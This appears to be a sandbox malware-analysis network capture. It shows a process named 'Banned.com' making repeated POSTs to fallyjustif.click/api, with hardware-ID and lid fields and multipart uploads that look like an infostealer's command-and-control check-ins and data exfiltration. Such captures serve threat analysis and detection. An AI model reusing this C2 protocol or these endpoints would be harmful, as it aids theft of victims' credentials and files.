2024-12-28 20:35:53 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fallyjustif.click
2024-12-28 20:35:53 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-28 20:35:53 UTC	1137	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 20:35:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rsfd17jdtnuc8e2r80f3andndj; expires=Wed, 23 Apr 2025 14:22:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Ku7%2FIU%2BIpSX1mRmYehXVmNlkbDn%2Bf%2FmsUAvH7%2BhP5wTKNUwLTx0wd5yxHwIXE2JS18TzG6KHhriRETz6X410UjMc6NPUmeK%2BxB81mkYdfJFUSqubJpj5WC8GbK%2F7H0l11ZiNw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9456e1ed588c72-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1830&rtt_var=722&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=908&delivery_rate=1595628&cwnd=174&unsent_bytes=0&cid=fc0871bdefe62bc0&ts=773&x=0"
2024-12-28 20:35:53 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-28 20:35:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	104.21.37.209	443	7800	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 20:35:55 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: fallyjustif.click
2024-12-28 20:35:55 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl1new1&j=
2024-12-28 20:35:55 UTC	1133	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 20:35:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=765jdv9llvfk146h8q4dokcemk; expires=Wed, 23 Apr 2025 14:22:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWu5ne8J8BpbBrqL95OIS2jeoP7y%2BLvs3aEtbSXvkEm5p8%2BV7eeZS8LvCYWRT6lCJJD89hnb2i%2FxeabYQMdAaDisHoCd18EoS7esYBZswRF7PVspWB%2BhklFwJVnLr%2BKW62QxwA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9456ef295bc484-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1603&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=950&delivery_rate=1773997&cwnd=248&unsent_bytes=0&cid=a2034ba7577b5231&ts=798&x=0"
2024-12-28 20:35:55 UTC	236	IN	Data Raw: 34 36 37 0d 0a 49 67 43 6b 4d 74 62 79 32 65 70 59 4e 2f 42 41 56 34 73 38 48 61 4b 2f 59 6f 50 4d 77 70 31 32 30 6a 67 4a 31 56 6c 38 50 6c 4e 5a 49 74 49 51 37 4d 62 31 79 43 74 53 30 6e 6f 6a 2b 55 6c 34 6a 70 30 44 35 2b 37 34 2b 78 65 2b 53 32 7a 35 65 77 70 54 63 52 68 6d 78 56 36 6c 6c 2f 58 49 50 55 2f 53 65 67 7a 77 48 6e 6a 4d 6e 56 69 68 71 61 6a 2f 46 37 35 61 61 4c 34 32 44 46 49 77 53 6d 7a 44 57 72 4f 52 76 59 73 30 57 70 55 6c 4d 75 70 57 63 38 76 53 43 75 37 75 37 72 38 54 71 42 6f 7a 39 78 51 5a 53 6a 4a 76 59 64 64 5a 39 49 2f 31 6b 58 70 53 6e 6d 4a 74 71 56 31 34 77 4e 4d 45 35 36 65 71 39 52 36 32 57 32 32 2f 4b 52 56 59 4f 30 70 69 77 46 75 35 6d 4b 6d 47 50 6c 32 65 49 7a 6a Data Ascii: 467IgCkMtby2epYN/BAV4s8HaK/YoPMwp120jgJ1Vl8PlNZItIQ7Mb1yCtS0noj+Ul4jp0D5+74+xe+S2z5ewpTcRhmxV6ll/XIPU/SegzwHnjMnVihqaj/F75aaL42DFIwSmzDWrORvYs0WpUlMupWc8vSCu7u7r8TqBoz9xQZSjJvYddZ9I/1kXpSnmJtqV14wNME56eq9R62W22/KRVYO0piwFu5mKmGPl2eIzj
2024-12-28 20:35:55 UTC	898	IN	Data Raw: 71 48 6a 47 41 32 68 69 68 39 75 43 73 4a 72 4e 4c 65 71 49 32 44 6c 70 78 58 79 7a 66 45 4c 4f 63 2b 39 42 36 58 5a 34 73 4d 4f 70 52 65 4d 48 64 45 75 36 75 6f 2f 63 63 74 46 42 6b 75 44 51 51 56 6a 5a 49 61 38 46 66 73 35 69 39 68 7a 6b 56 33 47 49 79 38 52 34 6e 67 50 30 51 34 71 32 30 38 67 58 77 52 53 57 75 65 78 6c 51 63 52 67 69 77 46 36 31 6e 62 75 61 4d 6c 36 5a 4a 79 66 69 56 33 4c 4e 33 51 33 72 6f 61 50 2f 45 37 70 51 5a 4c 30 2f 45 31 45 33 51 47 4b 47 48 76 53 58 6f 38 68 69 46 62 45 6e 4a 65 35 53 61 59 4c 6e 51 50 37 67 75 62 38 54 76 42 6f 7a 39 7a 4d 62 58 7a 4a 4c 62 63 56 59 76 34 4b 37 6d 6a 78 59 6c 7a 41 7a 37 46 42 31 77 38 38 4b 37 36 69 6a 39 68 2b 35 58 32 79 7a 65 31 41 63 4e 6c 67 69 6e 68 43 56 6e 62 43 45 4d 45 4b 53 59 69 Data Ascii: qHjGA2hih9uCsJrNLeqI2DlpxXyzfELOc+9B6XZ4sMOpReMHdEu6uo/cctFBkuDQQVjZIa8Ffs5i9hzkV3GIy8R4ngP0Q4q208gXwRSWuexlQcRgiwF61nbuaMl6ZJyfiV3LN3Q3roaP/E7pQZL0/E1E3QGKGHvSXo8hiFbEnJe5SaYLnQP7gub8TvBoz9zMbXzJLbcVYv4K7mjxYlzAz7FB1w88K76ij9h+5X2yze1AcNlginhCVnbCEMEKSYi
2024-12-28 20:35:55 UTC	1369	IN	Data Raw: 34 35 32 64 0d 0a 35 61 33 7a 4f 30 77 66 33 37 72 2b 78 44 66 42 64 5a 2f 64 6a 58 6c 4d 2b 54 32 72 47 55 62 43 64 76 34 6b 33 57 5a 73 68 4f 65 56 57 63 73 7a 5a 44 2b 6d 6d 6f 2f 63 47 76 6c 52 74 73 54 73 62 48 48 38 41 5a 64 34 51 37 4e 43 66 68 69 31 42 6d 57 41 41 36 6c 42 78 78 38 74 41 2f 75 43 35 76 78 4f 38 47 6a 50 33 4e 52 4e 58 50 55 64 72 78 31 4f 30 6d 72 57 48 4d 46 32 61 49 6a 6a 6f 56 58 66 47 30 41 76 75 6f 61 66 33 46 37 78 66 5a 72 52 37 55 42 77 32 57 43 4b 65 45 4a 47 65 75 4a 6b 72 46 36 63 68 4f 2b 64 5a 61 59 44 43 54 76 6a 75 70 2f 4e 55 36 42 70 68 73 44 77 61 55 54 74 44 5a 73 4a 64 75 35 6d 79 67 53 68 66 6e 69 77 6e 35 46 52 36 7a 74 45 46 37 71 36 68 2f 68 71 36 55 53 76 35 65 78 6c 45 63 52 67 69 36 56 32 6b 67 72 47 44 Data Ascii: 452d5a3zO0wf37r+xDfBdZ/djXlM+T2rGUbCdv4k3WZshOeVWcszZD+mmo/cGvlRtsTsbHH8AZd4Q7NCfhi1BmWAA6lBxx8tA/uC5vxO8GjP3NRNXPUdrx1O0mrWHMF2aIjjoVXfG0Avuoaf3F7xfZrR7UBw2WCKeEJGeuJkrF6chO+dZaYDCTvjup/NU6BphsDwaUTtDZsJdu5mygShfniwn5FR6ztEF7q6h/hq6USv5exlEcRgi6V2kgrGD
2024-12-28 20:35:55 UTC	1369	IN	Data Raw: 49 79 38 52 34 6e 67 50 49 44 39 36 54 67 34 46 71 70 47 6d 79 37 65 30 59 63 4f 30 78 6d 78 56 79 39 6e 4c 61 4a 50 6c 4b 66 4a 6a 58 76 57 48 72 42 31 67 6a 74 6f 61 72 7a 45 4c 78 54 62 62 73 34 48 56 70 78 44 69 4c 42 53 50 54 49 2b 36 6b 33 58 70 34 69 4e 76 68 5a 50 34 36 64 44 75 65 75 34 4b 63 43 6f 45 31 73 71 48 55 48 48 44 5a 4d 49 70 34 51 76 6f 4b 2b 68 6a 35 66 6c 79 59 35 34 31 35 36 30 74 55 47 35 71 4b 6f 2b 68 75 32 58 32 61 77 4d 42 31 4f 49 30 4e 6d 79 46 7a 30 33 76 75 50 49 68 58 4b 59 68 44 2b 58 57 2f 47 33 6b 44 2b 34 4c 6d 2f 45 37 77 61 4d 2f 63 37 45 46 41 36 52 32 6e 4e 56 4c 43 51 74 6f 4d 30 57 35 73 75 50 65 56 5a 62 63 33 59 43 4f 75 6e 70 66 4d 5a 73 30 68 6f 74 6e 74 51 48 44 5a 59 49 70 34 51 6b 36 4f 4d 71 33 70 4b 33 Data Ascii: Iy8R4ngPID96Tg4FqpGmy7e0YcO0xmxVy9nLaJPlKfJjXvWHrB1gjtoarzELxTbbs4HVpxDiLBSPTI+6k3Xp4iNvhZP46dDueu4KcCoE1sqHUHHDZMIp4QvoK+hj5flyY541560tUG5qKo+hu2X2awMB1OI0NmyFz03vuPIhXKYhD+XW/G3kD+4Lm/E7waM/c7EFA6R2nNVLCQtoM0W5suPeVZbc3YCOunpfMZs0hotntQHDZYIp4Qk6OMq3pK3
2024-12-28 20:35:55 UTC	1369	IN	Data Raw: 47 50 35 69 64 4c 4f 4b 68 71 37 38 4c 2f 6b 4d 72 73 44 64 65 42 48 46 48 61 73 35 65 74 35 61 77 68 44 5a 55 6d 79 51 77 34 56 6c 77 78 39 51 48 34 61 69 79 2b 42 6d 35 57 6d 43 2b 4d 52 70 64 4f 67 41 73 68 6c 65 73 30 4f 50 49 43 46 4b 45 4d 6a 61 70 51 54 48 5a 6e 51 66 74 37 76 69 2f 47 61 4a 62 62 71 55 2f 45 56 63 6a 53 32 54 47 56 61 61 58 74 34 49 31 56 70 6f 76 4e 75 46 4d 66 38 33 64 45 76 4f 6f 71 2f 46 55 2f 68 70 73 72 33 74 47 48 41 42 58 61 59 5a 50 2b 6f 6e 37 6a 7a 59 56 79 6d 49 32 34 31 4e 78 30 74 6b 47 36 71 32 75 39 78 47 34 58 6d 47 36 4e 42 56 57 4f 45 68 69 79 56 57 38 6d 37 32 47 4f 31 4f 65 4c 33 57 6e 48 6e 6a 59 6e 56 69 68 69 62 72 79 45 71 64 4c 58 72 41 37 54 78 77 75 44 6e 75 47 56 37 6a 51 34 38 67 33 57 5a 67 76 4d 4f Data Ascii: GP5idLOKhq78L/kMrsDdeBHFHas5et5awhDZUmyQw4Vlwx9QH4aiy+Bm5WmC+MRpdOgAshles0OPICFKEMjapQTHZnQft7vi/GaJbbqU/EVcjS2TGVaaXt4I1VpovNuFMf83dEvOoq/FU/hpsr3tGHABXaYZP+on7jzYVymI241Nx0tkG6q2u9xG4XmG6NBVWOEhiyVW8m72GO1OeL3WnHnjYnVihibryEqdLXrA7TxwuDnuGV7jQ48g3WZgvMO
2024-12-28 20:35:55 UTC	1369	IN	Data Raw: 77 6b 37 34 37 71 66 7a 56 4f 67 61 5a 62 6f 39 48 31 30 35 53 47 4c 41 57 72 43 54 73 6f 73 39 58 4a 51 70 4e 75 4e 52 65 4d 62 5a 41 4f 71 70 72 76 6b 52 75 31 4d 72 2b 58 73 5a 52 48 45 59 49 75 42 7a 70 6f 4b 4a 68 6a 6c 4f 30 6a 31 37 38 42 35 34 7a 4a 31 59 6f 61 57 6f 38 41 61 31 55 32 4f 7a 4d 68 35 59 4f 30 31 6c 78 6c 57 35 6c 62 2b 47 50 6c 4b 53 4c 6a 72 75 56 6e 44 45 33 51 2b 68 34 4f 44 34 44 50 41 43 4b 35 63 77 43 48 30 2f 53 33 43 47 54 2f 71 4a 2b 34 38 32 46 63 70 69 4f 2b 42 66 64 38 37 52 43 4f 57 38 6f 50 51 64 76 31 74 6b 74 7a 67 66 56 6a 6c 53 5a 4d 5a 62 76 4a 65 7a 6a 44 52 48 6b 79 31 31 70 78 35 34 32 4a 31 59 6f 5a 2b 32 2b 42 4f 2f 47 45 4b 77 49 42 39 57 4d 6b 74 75 68 6b 2f 36 69 66 75 50 4e 68 58 4b 59 6a 6a 6c 55 33 76 Data Ascii: wk747qfzVOgaZbo9H105SGLAWrCTsos9XJQpNuNReMbZAOqprvkRu1Mr+XsZRHEYIuBzpoKJhjlO0j178B54zJ1YoaWo8Aa1U2OzMh5YO01lxlW5lb+GPlKSLjruVnDE3Q+h4OD4DPACK5cwCH0/S3CGT/qJ+482FcpiO+Bfd87RCOW8oPQdv1tktzgfVjlSZMZbvJezjDRHky11px542J1YoZ+2+BO/GEKwIB9WMktuhk/6ifuPNhXKYjjlU3v
2024-12-28 20:35:55 UTC	1369	IN	Data Raw: 71 4c 67 70 31 53 37 56 47 36 32 4e 78 52 62 50 31 4a 6a 7a 46 79 31 6c 37 79 44 4b 46 36 41 4b 54 33 71 55 48 66 4a 33 51 37 68 72 36 33 2f 56 50 34 61 62 4b 39 37 52 68 77 55 59 33 58 51 57 76 61 7a 72 4a 34 77 55 70 34 30 50 75 68 64 61 63 33 4e 51 4b 2f 75 73 66 67 46 38 41 4a 39 70 79 77 5a 51 33 39 5a 49 73 46 63 39 4d 6a 37 67 7a 56 62 6e 79 6b 78 34 46 74 33 77 39 67 46 36 36 4b 73 2f 68 79 35 55 47 36 79 50 52 52 66 50 30 39 6a 79 6c 53 39 6e 72 4c 49 64 42 57 56 4f 6e 57 78 48 6b 6e 51 32 68 6a 73 76 75 4c 4e 46 36 46 4c 66 72 6f 72 47 42 34 65 51 32 37 46 56 62 4f 41 2b 35 64 30 54 4e 49 6c 4f 61 6b 47 50 38 44 5a 44 4f 4b 70 72 76 41 5a 76 31 31 67 75 44 45 51 54 6a 35 46 61 73 70 59 75 59 4b 78 67 69 68 63 6d 79 38 37 34 55 78 38 67 4a 4e 41 Data Ascii: qLgp1S7VG62NxRbP1JjzFy1l7yDKF6AKT3qUHfJ3Q7hr63/VP4abK97RhwUY3XQWvazrJ4wUp40Puhdac3NQK/usfgF8AJ9pywZQ39ZIsFc9Mj7gzVbnykx4Ft3w9gF66Ks/hy5UG6yPRRfP09jylS9nrLIdBWVOnWxHknQ2hjsvuLNF6FLfrorGB4eQ27FVbOA+5d0TNIlOakGP8DZDOKprvAZv11guDEQTj5FaspYuYKxgihcmy874Ux8gJNA
2024-12-28 20:35:55 UTC	1369	IN	Data Raw: 39 4d 69 52 6f 6a 39 77 52 51 48 43 6b 41 4f 6f 5a 6c 74 35 36 31 6a 79 78 45 33 77 4d 34 34 6c 4a 79 7a 39 5a 41 72 2b 36 6d 76 30 7a 67 46 43 75 7a 4b 6c 34 45 59 52 49 35 6b 77 50 6a 77 4f 6d 58 64 45 7a 53 4e 48 57 78 44 44 47 41 7a 30 43 35 37 75 66 38 42 71 4a 63 61 4b 45 34 57 57 49 50 59 33 58 51 57 71 2f 53 6e 59 38 72 58 49 51 76 4a 39 64 67 55 63 33 63 41 2b 2f 73 6b 65 6b 5a 6f 46 6c 75 73 41 55 67 55 6a 5a 55 5a 63 68 57 74 4e 44 31 79 44 55 56 79 68 74 31 6f 52 35 41 6a 70 30 59 6f 66 62 67 79 68 65 2b 56 47 79 68 4b 6c 4e 2f 4a 6c 5a 6f 33 52 4b 53 6c 36 71 42 4c 46 69 41 59 6e 75 70 57 44 2b 59 6a 55 36 68 71 72 47 2f 54 4f 41 49 4d 4f 4a 6f 53 51 78 6a 58 79 7a 66 45 4b 4c 51 34 39 70 30 46 59 42 69 62 61 6b 5a 66 4e 4c 50 42 75 4b 34 6f Data Ascii: 9MiRoj9wRQHCkAOoZlt561jyxE3wM44lJyz9ZAr+6mv0zgFCuzKl4EYRI5kwPjwOmXdEzSNHWxDDGAz0C57uf8BqJcaKE4WWIPY3XQWq/SnY8rXIQvJ9dgUc3cA+/skekZoFlusAUgUjZUZchWtND1yDUVyht1oR5Ajp0Yofbgyhe+VGyhKlN/JlZo3RKSl6qBLFiAYnupWD+YjU6hqrG/TOAIMOJoSQxjXyzfEKLQ49p0FYBibakZfNLPBuK4o
2024-12-28 20:35:55 UTC	1369	IN	Data Raw: 61 62 36 5a 37 52 67 78 6a 47 7a 65 56 42 2b 54 43 70 4d 59 6a 46 59 52 69 62 62 73 51 50 39 4b 64 57 4b 48 70 6f 2b 30 47 74 6c 6c 39 74 48 77 67 59 67 52 44 62 4d 68 58 6f 71 57 34 6d 54 6c 56 6d 52 77 4c 79 46 42 30 78 39 45 57 33 35 43 56 2f 42 71 2b 58 58 32 6d 65 31 41 63 50 67 41 36 2f 78 44 38 30 49 54 47 65 6b 33 53 65 6e 58 63 58 58 48 4f 32 68 62 77 34 35 58 38 42 62 4e 61 59 50 64 31 58 6c 70 78 47 44 43 49 45 4c 43 42 2b 39 42 71 42 38 6c 33 5a 72 34 4f 4c 64 2b 54 47 61 47 34 34 4b 64 47 2f 68 70 35 39 32 4e 65 47 7a 4a 53 63 4d 42 54 6f 70 50 38 74 67 52 7a 6b 53 55 7a 36 6c 42 6f 30 5a 38 76 34 71 57 73 38 78 4f 6d 5a 46 57 69 4f 42 42 53 4e 6c 5a 7a 68 68 37 30 6e 2f 76 51 41 78 57 44 4b 44 4b 6c 46 6a 50 52 7a 67 37 71 75 4b 65 2f 4b 2f Data Ascii: ab6Z7RgxjGzeVB+TCpMYjFYRibbsQP9KdWKHpo+0Gtll9tHwgYgRDbMhXoqW4mTlVmRwLyFB0x9EW35CV/Bq+XX2me1AcPgA6/xD80ITGek3SenXcXXHO2hbw45X8BbNaYPd1XlpxGDCIELCB+9BqB8l3Zr4OLd+TGaG44KdG/hp592NeGzJScMBTopP8tgRzkSUz6lBo0Z8v4qWs8xOmZFWiOBBSNlZzhh70n/vQAxWDKDKlFjPRzg7quKe/K/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	104.21.37.209	443	7800	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 20:35:57 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AQ4D61LZJF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18117 Host: fallyjustif.click
2024-12-28 20:35:57 UTC	15331	OUT	Data Raw: 2d 2d 41 51 34 44 36 31 4c 5a 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 41 51 34 44 36 31 4c 5a 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 51 34 44 36 31 4c 5a 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d 41 51 34 44 36 31 4c 5a 4a 46 0d 0a 43 6f 6e 74 65 6e Data Ascii: --AQ4D61LZJFContent-Disposition: form-data; name="hwid"FC32E3FE86DBE0A31441EDD8E05CE3DA--AQ4D61LZJFContent-Disposition: form-data; name="pid"2--AQ4D61LZJFContent-Disposition: form-data; name="lid"MeHdy4--pl1new1--AQ4D61LZJFConten
2024-12-28 20:35:57 UTC	2786	OUT	Data Raw: 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
2024-12-28 20:35:58 UTC	1141	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 20:35:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fdjvgpbj3d7ll8kbhraj1bqtn6; expires=Wed, 23 Apr 2025 14:22:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cw8BkG0nU%2BtbJi4Rs928lNZE%2B0%2FuBChKAy8n2mfHZWA6E2fweECm8fiDM1tEacTpyqzxucsvf6%2Fw%2FGjvxmiChuskF1X3NXgnu6JUfs9SLEDGNxyPF5pt%2FNDgKjgOMsV%2FMazJjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9456fef8517c88-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1821&rtt_var=691&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19072&delivery_rate=1574123&cwnd=219&unsent_bytes=0&cid=6b3eca48bb8eef7f&ts=985&x=0"
2024-12-28 20:35:58 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 20:35:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49747	104.21.37.209	443	7800	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 20:36:00 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WUB58VWQQVKX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8750 Host: fallyjustif.click
2024-12-28 20:36:00 UTC	8750	OUT	Data Raw: 2d 2d 57 55 42 35 38 56 57 51 51 56 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 57 55 42 35 38 56 57 51 51 56 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 55 42 35 38 56 57 51 51 56 4b 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d 57 55 42 35 38 56 57 51 51 56 4b 58 Data Ascii: --WUB58VWQQVKXContent-Disposition: form-data; name="hwid"FC32E3FE86DBE0A31441EDD8E05CE3DA--WUB58VWQQVKXContent-Disposition: form-data; name="pid"2--WUB58VWQQVKXContent-Disposition: form-data; name="lid"MeHdy4--pl1new1--WUB58VWQQVKX
2024-12-28 20:36:00 UTC	1135	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 20:36:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e51pbad6ic1510f43mldq52779; expires=Wed, 23 Apr 2025 14:22:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kpmqgqwFwQsjhoavmC%2BtbIMXRABF1SmiGtsyydeG%2F9ZxnfnndH%2FvMw6sDJ7pwP61dmayqpXN%2F3zeeomY7XB1x21CPd8RnNkeQ8LhZmf%2F2UIHnwgeDgkBHmjLxf4o0kTWLtSJ8Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94570d0eab440d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1633&rtt_var=613&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2841&recv_bytes=9684&delivery_rate=1788120&cwnd=177&unsent_bytes=0&cid=a37bab8a0bec7ff3&ts=877&x=0"
2024-12-28 20:36:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 20:36:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49753	104.21.37.209	443	7800	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 20:36:02 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=B9W5VFRBJ5VK1I4ECJK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20445 Host: fallyjustif.click
